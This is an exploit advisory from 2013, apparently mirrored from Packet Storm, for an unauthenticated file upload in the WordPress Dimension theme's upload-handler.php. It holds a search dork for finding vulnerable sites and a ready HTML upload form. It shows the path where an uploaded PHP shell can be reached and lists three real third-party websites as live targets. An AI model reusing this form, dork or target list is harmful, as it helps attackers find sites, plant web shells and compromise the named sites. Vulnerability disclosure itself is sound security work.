WordPress Dimension Cross Site Request Forgery

🗓️ 17 Nov 2013 00:00:00Reported by DevilScreaMType

packetstorm🔗 packetstormsecurity.com👁 21 Views

WordPress Dimension Themes CSRF File Upload Vulnerability identified by DevilScreaM on 17 November 2013. Allows unauthorized file upload via upload-handler.php

`#Title : Wordpress Dimension Themes CSRF File Upload Vulnerability  
  
#Author : DevilScreaM  
  
#Date : 11/17/2013 - 17 November 2013  
  
#Category : Web Applications  
  
#Type : PHP  
  
#Vendor : http://themeforest.net  
  
#Download : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Tested : Mozila, Chrome, Opera -> Windows & Linux  
  
#Vulnerabillity : CSRF  
  
#Dork :   
  
inurl:wp-content/themes/dimension  
  
  
CSRF File Upload Vulnerability  
  
Exploit & POC :   
  
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php  
  
Script :  
  
<form enctype="multipart/form-data"  
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post">   
Your File: <input name="uploadfile" type="file" /><br />   
<input type="submit" value="upload" />   
</form>   
  
  
File Access :  
  
http://site-target/uploads/[years]/[month]/your_shell.php  
  
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php  
  
Live Demo :  
  
http://kevinfortuneuk.com/wp-content/themes/dimension/library/includes/upload-handler.php  
http://boyjansen.com/wp-content/themes/dimension/library/includes/upload-handler.php  
http://jbconsultgroup.com/wp-content/themes/dimension/library/includes/upload-handler.php  
`

17 Nov 2013 00:00Current

0.6Low risk

Vulners AI Score0.6